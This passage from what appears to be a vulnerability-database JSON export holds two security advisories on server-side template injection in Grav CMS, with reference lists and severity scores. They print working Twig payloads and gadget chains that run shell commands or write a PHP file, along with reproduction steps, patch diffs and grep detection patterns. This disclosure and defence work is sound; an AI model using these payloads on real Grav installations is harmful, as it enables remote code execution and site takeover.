Since only `filter()` is being overridden by Grav to ensure that the callable passed to `filter()` does not result in the invocation of an unsafe function, the other two functions (i.e. `map()` and `reduce()`) could be used by an authenticated attacker who is able to inject and render malicious templates to gain remote code execution.\n\n## Exploit Conditions:    \nThis vulnerability can be exploited if the attacker has access to:\n1. an administrator account, or\n2. a non-administrator user account that is granted the following permissions:\n    - login access to Grav admin panel, and\n    - page creation or update rights\n\n## Reproduction Steps:  \n1. Log in to Grav Admin using an administrator account.\n2. Navigate to `Accounts > Add`, and ensure that the following permissions are assigned when creating a new low-privileged user:\n    * Login to Admin - Allowed\n    * Page Update - Allowed\n3. Log out of Grav Admin, and log back in using the account created in step 2.\n4. Navigate to `http://<grav_installation>/admin/pages/home`.\n5. Click the `Advanced` tab and select the checkbox beside `Twig` to ensure that Twig processing is enabled for the modified webpage.\n6. Under the `Content` tab, insert the following payload within the editor:\n   ~~~twig\n   {{ ['id'] | map('system') }}\n   {{ ['id'] | reduce('system') }}\n   ~~~\n7. Click the Preview button. 
Observe that the output of the `id` shell command is returned in the preview.\n\n## Suggested Mitigations:  \nOverride the built-in Twig `map()` and `reduce()` filter functions in `system/src/Grav/Common/Twig/Extension/GravExtension.php` to validate the argument passed to the filter in `$arrow`.\n\nFor example:\n~~~diff\n...\nclass GravExtension extends AbstractExtension implements GlobalsInterface\n{\n    ...\n    public function getFilters(): array\n    {\n        return [\n            ...\n            // Security fix\n            new TwigFilter('filter', [$this, 'filterFilter'], ['needs_environment' => true]),\n+           new TwigFilter('map', [$this, 'mapFilter'], ['needs_environment' => true]),\n+           new TwigFilter('reduce', [$this, 'reduceFilter'], ['needs_environment' => true]),\n        ];\n    }\n\n    ...\n+   /**\n+    * @param Environment $env\n+    * @param array $array\n+    * @param callable|string $arrow\n+    * @return array|CallbackFilterIterator\n+    * @throws RuntimeError\n+    */\n+   function mapFilter(Environment $env, $array, $arrow)\n+   {\n+       if (!$arrow instanceof Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) {\n+           throw new RuntimeError('Twig |map(\"' . $arrow . '\") is not allowed.');\n+       }\n+\n+       return \\twig_array_map($env, $array, $arrow);\n+   }\n+ \n+   /**\n+    * @param Environment $env\n+    * @param array $array\n+    * @param callable|string $arrow\n+    * @return array|CallbackFilterIterator\n+    * @throws RuntimeError\n+    */\n+   function reduceFilter(Environment $env, $array, $arrow)\n+   {\n+       if (!$arrow instanceof Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) {\n+           throw new RuntimeError('Twig |reduce(\"' . $arrow . 
'\") is not allowed.');\n+       }\n+\n+       return \\twig_array_reduce($env, $array, $arrow);\n+   }\n}\n~~~\n\n## Detection Guidance:  \nThe following strategies may be used to detect potential exploitation attempts.\n1. Searching within Markdown pages using the following shell command:  \n   `grep -Priz -e '\\|\\s*(map|reduce)\\s*\\(' /path/to/webroot/user/pages/`\n2. Searching within Doctrine cache data using the following shell command:  \n   `grep -Priz -e '\\|\\s*(map|reduce)\\s*\\('  --include '*.doctrinecache.data' /path/to/webroot/cache/`\n3. Searching within Twig cache using the following shell command:  \n   `grep -Priz -e 'twig_array_(map|reduce)' /path/to/webroot/cache/twig/`\n4. Searching within compiled Twig template files using the following shell command:  \n   `grep -Priz -e '\\|\\s*(map|reduce)\\s*\\(' /path/to/webroot/cache/compiled/files/`\n\nNote that it is not possible to detect indicators of compromise reliably using the Grav log file (located at `/path/to/webroot/logs/grav.log` by default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts.\n\n## Credits:  \nNgo Wei Lin ([@Creastery](https://twitter.com/Creastery)) & Wang Hengyue ([@w_hy_04](https://twitter.com/w_hy_04)) of STAR Labs SG Pte. Ltd. ([@starlabs_sg](https://twitter.com/starlabs_sg))\n\n## Vulnerability Disclosure:  \nThis vulnerability report is subject to a 120 day disclosure deadline as per [STAR Labs SG Pte. Ltd.'s Vulnerability Disclosure Policy](https://starlabs.sg/advisories/STAR%20Labs%20SG%20Pte.%20Ltd.%20Vulnerability%20Disclosure%20Policy.pdf). After 120 days have elapsed, the vulnerability report will be published to the public by [STAR Labs SG Pte. Ltd.](https://starlabs.sg/) (STAR Labs).  \n\nThe scheduled disclosure date is _**25th July, 2023**_. 
Disclosure at an earlier date is also possible if agreed upon by all parties.  \n\nKindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report:  \n1. **CVE-2023-30596**\n    Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `GravExtension.filterFilter()` and to achieve remote code execution via Twig's default filters `map()` and `reduce()`. This is a bypass of CVE-2022-2073.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34448","reference_id":"","reference_type":"","scores":[{"value":"0.08847","scoring_system":"epss","scoring_elements":"0.92666","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34448"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec"},{"reference_url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ge
tgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"},{"reference_url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/"}],"url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8"},{"reference_url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-whr7-m3f8-mpm8","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-whr7-m3f8-mpm8"},{"reference_url":"https://github.com/twigphp/Twig/blob/v1.44.7/src/Environment.php#L148","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S
:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/"}],"url":"https://github.com/twigphp/Twig/blob/v1.44.7/src/Environment.php#L148"},{"reference_url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66"},{"reference_url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/"}],"url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34448","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34448"},{"reference_url":"https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_t
extual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:38:33Z/"}],"url":"https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83"},{"reference_url":"https://github.com/advisories/GHSA-whr7-m3f8-mpm8","reference_id":"GHSA-whr7-m3f8-mpm8","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-whr7-m3f8-mpm8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/72011?format=json","purl":"pkg:composer/getgrav/grav@1.7.42","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13tt-ebbj-eyg8"},{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-g8rq-2ss6-3kcu"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-v5ah-z3uv-fbet"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42
"}],"aliases":["CVE-2023-34448","GHSA-whr7-m3f8-mpm8"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ppnh-1zmd-t3c5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38772?format=json","vulnerability_id":"VCID-q9c3-abt1-2kdf","summary":"Grav Server-side Template Injection (SSTI) via Twig Default Filters\nHi,\n\nactually we have sent the bug report to [security@getgrav.org](mailto:security@getgrav.org) on 27th March 2023 and on 10th April 2023.\n\n# Grav Server-side Template Injection (SSTI) via Insufficient Validation in filterFilter\n\n## Summary:  \n| **Product**             | Grav CMS                                      |\n| ----------------------- | --------------------------------------------- |\n| **Vendor**              | Grav                                          |\n| **Severity**            | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution |\n| **Affected Versions**   | <= [v1.7.40](https://github.com/getgrav/grav/tree/1.7.40) (Commit [685d762](https://github.com/getgrav/grav/commit/685d76231a057416651ed192a6a2e83720800e61)) (Latest version as of writing) |\n| **Tested Versions**     | v1.7.40                                       |\n| **Internal Identifier** | STAR-2023-0007                                |\n| **CVE Identifier**      | TBD                                           |\n| **CWE(s)**              | CWE-20: Improper Input Validation, CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine |\n\n## CVSS3.1 Scoring System:  \n**Base Score:** 7.2 (High)  \n**Vector String:** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H`  \n| **Metric**                   | **Value** |\n| ---------------------------- | --------- |\n| **Attack Vector (AV)**       | Network   |\n| **Attack Complexity (AC)**   | Low       |\n| **Privileges Required 
(PR)** | High      |\n| **User Interaction (UI)**    | None      |\n| **Scope (S)**                | Unchanged |\n| **Confidentiality \\(C)**     | High      |\n| **Integrity (I)**            | High      |\n| **Availability (A)**         | High      |\n\n## Product Overview:  \nGrav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin.\n\n## Vulnerability Summary:  \nThere is a logic flaw in the `GravExtension.filterFilter()` function whereby validation against a denylist of unsafe functions is only performed when the argument passed to filter is a string. However, passing an array as a callable argument allows the validation check to be skipped. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution.\n\n## Vulnerability Details:  \nThe vulnerability can be found in the `GravExtension.filterFilter()` function declared in [`/system/src/Grav/Common/Twig/Extension/GravExtension.php`](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Twig/Extension/GravExtension.php#L1692-L1698):\n~~~php\n...\nclass GravExtension extends AbstractExtension implements GlobalsInterface\n{\n    ...\n    \n    /**\n     * Return a list of all filters.\n     *\n     * @return array\n     */\n    public function getFilters(): array\n    {\n        return [\n            ...\n            \n            // Security fix\n            new TwigFilter('filter', [$this, 'filterFilter'], ['needs_environment' => true]),\n        ];\n    }\n\n    ...\n\n    /**\n     * @param Environment $env\n     * @param array $array\n     * @param callable|string $arrow\n     * @return array|CallbackFilterIterator\n     * @throws 
RuntimeError\n     */\n    function filterFilter(Environment $env, $array, $arrow)\n    {\n        if (is_string($arrow) && Utils::isDangerousFunction($arrow)) { // [1]\n            throw new RuntimeError('Twig |filter(\"' . $arrow . '\") is not allowed.');\n        }\n\n        return \\twig_array_filter($env, $array, $arrow); // [2]\n    }\n}\n~~~\n\nAt [1], the `$arrow` parameter contains the argument supplied to the filter. For example, it may refer to `\"funcname\"` in `{{ array|filter(\"funcname\") }}` or the closure (a.k.a. arrow function) `el => el != 'exclude'` in `{{ array|filter(el => el != 'exclude') }}`. Observe that `Utils::isDangerousFunction($arrow)` is only invoked if `$arrow` is a string. As such, non-string arguments may be passed to `twig_array_filter()` at [2] due to the absence of type enforcement at [1].\n\nThe implementation of the `twig_array_filter()` function can be found in [/src/Extension/CoreExtension.php](https://github.com/twigphp/Twig/blob/v1.44.7/src/Extension/CoreExtension.php) within Twig's codebase:\n~~~php\nfunction twig_array_filter(Environment $env, $array, $arrow)\n{\n    if (!twig_test_iterable($array)) {\n        throw new RuntimeError(sprintf('The \"filter\" filter expects an array or \"Traversable\", got \"%s\".', \\is_object($array) ? 
\\get_class($array) : \\gettype($array)));\n    }\n\n    if (!$arrow instanceof Closure && $env->hasExtension('\\Twig\\Extension\\SandboxExtension') && $env->getExtension('\\Twig\\Extension\\SandboxExtension')->isSandboxed()) { // [3]\n        throw new RuntimeError('The callable passed to \"filter\" filter must be a Closure in sandbox mode.');\n    }\n\n    if (\\is_array($array)) {\n        if (\\PHP_VERSION_ID >= 50600) {\n            return array_filter($array, $arrow, \\ARRAY_FILTER_USE_BOTH); // [4]\n        }\n\n        return array_filter($array, $arrow);\n    }\n\n    // the IteratorIterator wrapping is needed as some internal PHP classes are \\Traversable but do not implement \\Iterator\n    return new \\CallbackFilterIterator(new \\IteratorIterator($array), $arrow);\n}\n~~~\n\nAt [3], a runtime error is thrown if `$arrow` is not a closure and Twig sandbox is enabled. However, since Grav does not use the Twig Sandbox extension, the check passes successfully even when `$arrow` is not a closure. Subsequently at [4], `array_filter()` is invoked with the user-controlled `$array` input and `$arrow` parameter.\n\nNote that the method signature of `array_filter()` is as follows:\n~~~php\narray_filter(array $array, ?callable $callback = null, int $mode = 0): array\n~~~\n\nA common mistake that developers make is assuming that the `callable` type refers to a `string` type. This is untrue, and it is [well documented in the PHP Manual](https://www.php.net/manual/en/language.types.callable.php):\n> A method of an instantiated object is passed as an **array containing an object at index 0 and the method name at index 1**. 
Accessing protected and private methods from within a class is allowed.\n> Static class methods can also be passed without instantiating an object of that class by either, **passing the class name instead of an object at index 0, or passing `ClassName::methodName`**.\n\nThis means that all of the following method calls are valid:\n~~~php\n// Type 1: Simple callback -- invokes system(\"id\")\narray_filter(array(\"id\"), \"system\");\n\n// Type 2: Static class method call -- invokes Class::staticMethod($arg)\narray_filter(array($arg), array(\"Class\", \"staticMethod\"));\narray_filter(array($arg), \"Class::staticMethod\"); // same as above, using the string form\n\n// Type 3: Object method call -- invokes $obj->method($arg)\narray_filter(array($arg), array($obj, \"method\"));\n~~~\n\nGoing back to [1], if `$arrow` is an `array` instead of a `string` or `closure`, the validation check to prevent invocation of unsafe functions is completely skipped. Multiple static class methods within Grav's codebase and its dependencies were found to be suitable gadgets for achieving remote code execution:\n~~~twig\n// Gadget 1: Using \\Grav\\Common\\Utils::arrayFilterRecursive() within Grav's codebase to invoke system(\"id\"):\n{% set id = {'id': 0} %}\n{{ {'system': id} | filter('\\\\Grav\\\\Common\\\\Utils', 'arrayFilterRecursive') }}\n\n// Gadget 2: Using \\Symfony\\Component\\VarDumper\\Vardumper::setHandler() and \\Symfony\\Component\\VarDumper\\Vardumper::dump() to invoke system(\"id\"):\n{{ ['system'] | filter(['\\\\Symfony\\\\Component\\\\VarDumper\\\\VarDumper', 'setHandler'])}}\n{{ ['id'] | filter(['\\\\Symfony\\\\Component\\\\VarDumper\\\\VarDumper', 'dump']) }}\n\n// Gadget 3: Using \\RocketTheme\\Toolbox\\File\\File::instance() in Grav's default theme to perform arbitrary file write to rce.php in the webroot:\n{{ (['rce.php'] | map(['\\\\RocketTheme\\\\Toolbox\\\\File\\\\File', 'instance']))[0].save('<?php echo phpinfo(); ') }}\n\n// Gadget 4: Using 
\\Symfony\\Component\\Process\\Process::fromShellCommandline() to invoke system(\"id\"):\n{{ {'/':'sleep 3'} | map(['\\\\Symfony\\\\Component\\\\Process\\\\Process', 'fromShellCommandline']) | map(e => e.run()) | print_r }}\n~~~\n\n## Exploit Conditions:    \nThis vulnerability can be exploited if the attacker has access to:\n1. an administrator account, or\n2. a non-administrator user account that is granted the following permissions:\n    - login access to Grav admin panel, and\n    - page creation or update rights\n\n## Reproduction Steps:  \n1. Log in to Grav Admin using an administrator account.\n2. Navigate to `Accounts > Add`, and ensure that the following permissions are assigned when creating a new low-privileged user:\n    * Login to Admin - Allowed\n    * Page Update - Allowed\n3. Log out of Grav Admin, and log back in using the account created in step 2.\n4. Navigate to `http://<grav_installation>/admin/pages/home`.\n5. Click the `Advanced` tab and select the checkbox beside `Twig` to ensure that Twig processing is enabled for the modified webpage.\n6. Under the `Content` tab, insert the following payload within the editor:\n   ~~~twig\n   // Gadget 1: Using \\Grav\\Common\\Utils::arrayFilterRecursive() within Grav's codebase to invoke system(\"id\"):\n   {% set id = {'id': 0} %}\n   {{ {'system': id} | filter('\\\\Grav\\\\Common\\\\Utils', 'arrayFilterRecursive') }}\n   ~~~\n7. Click the Preview button. 
Observe that the output of the `id` shell command is returned in the preview.\n\n## Suggested Mitigations:  \nPatch the logic flaw in the `GravExtension.filterFilter()` function declared in `/system/src/Grav/Common/Twig/Extension/GravExtension.php` to ensure that the `$arrow` parameter passed to the `filterFilter()` function must be either a `string` or an arrow function, as follows:\n~~~diff php\n...\nclass GravExtension extends AbstractExtension implements GlobalsInterface\n{\n    ...\n\n    /**\n     * @param Environment $env\n     * @param array $array\n     * @param callable|string $arrow\n     * @return array|CallbackFilterIterator\n     * @throws RuntimeError\n     */\n    function filterFilter(Environment $env, $array, $arrow)\n    {\n-       if (is_string($arrow) && Utils::isDangerousFunction($arrow)) {\n+       if (!$arrow instanceof Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) {\n            throw new RuntimeError('Twig |filter(\"' . $arrow . '\") is not allowed.');\n        }\n\n        return \\twig_array_filter($env, $array, $arrow);\n    }\n}\n~~~\n\n`Utils::isDangerousFunction()` in [/system/src/Grav/Common/Utils.php](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074) should also be patched to prevent static class methods from being invoked. 
For example,\n~~~diff php\n...\nabstract class Utils\n{\n    ...\n    /**\n     * @param string $name\n     * @return bool\n     */\n    public static function isDangerousFunction(string $name): bool\n    {\n        ...\n\n+       if (is_array($name) || strpos($name, \":\") !== false) {\n+           return false;\n+       }\n\n        if (in_array($name, $commandExecutionFunctions)) {\n            return true;\n        }\n\n        if (in_array($name, $codeExecutionFunctions)) {\n            return true;\n        }\n\n        if (isset($callbackFunctions[$name])) {\n            return true;\n        }\n\n        if (in_array($name, $informationDiscosureFunctions)) {\n            return true;\n        }\n\n        if (in_array($name, $otherFunctions)) {\n            return true;\n        }\n\n        return static::isFilesystemFunction($name);\n    }\n    ...\n}\n~~~\n\nEnd users should also ensure that `twig.undefined_functions` and `twig.undefined_filters` properties in `/path/to/webroot/system/config/system.yaml` configuration file are set to `false` to disallow Twig from treating undefined filters/functions as PHP functions and executing them.\n\n## Detection Guidance:  \nThe following strategies may be used to detect potential exploitation attempts.\n1. Searching within Markdown pages using the following shell command:  \n   `grep -Priz -e '\\|\\s*(filter|map|reduce)\\s*\\(' /path/to/webroot/user/pages/`\n2. Searching within Doctrine cache data using the following shell command:  \n   `grep -Priz -e '\\|\\s*(filter|map|reduce)\\s*\\('  --include '*.doctrinecache.data' /path/to/webroot/cache/`\n3. Searching within Twig cache using the following shell command:  \n   `grep -Priz -e 'twig_array_(filter|map|reduce)' /path/to/webroot/cache/twig/`\n4. 
Searching within compiled Twig template files using the following shell command:  \n   `grep -Priz -e '\\|\\s*(filter|map|reduce)\\s*\\(' /path/to/webroot/cache/compiled/files/`\n\nNote that it is not possible to detect indicators of compromise reliably using the Grav log file (located at `/path/to/webroot/logs/grav.log` by default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts.\n\n## Credits:  \nNgo Wei Lin ([@Creastery](https://twitter.com/Creastery)) & Wang Hengyue ([@w_hy_04](https://twitter.com/w_hy_04)) of STAR Labs SG Pte. Ltd. ([@starlabs_sg](https://twitter.com/starlabs_sg))\n\nKindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report:  \n1. **CVE-2023-30595**\n    Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `GravExtension.filterFilter()` and to achieve remote code execution via usage of fully-qualified names, supplied as arrays of strings, when referencing callables. 
This is a bypass of CVE-2022-2073.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34252","reference_id":"","reference_type":"","scores":[{"value":"0.00529","scoring_system":"epss","scoring_elements":"0.67457","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34252"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Twig/Extension/GravExtension.php#L1692-L1698","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/"}],"url":"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Twig/Extension/GravExtension.php#L1692-L1698"},{"reference_url":"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/"}],"url":"https://github.com/getgrav/grav/bl
ob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074"},{"reference_url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/"}],"url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec"},{"reference_url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"},{"reference_url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8"},{"reference_url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/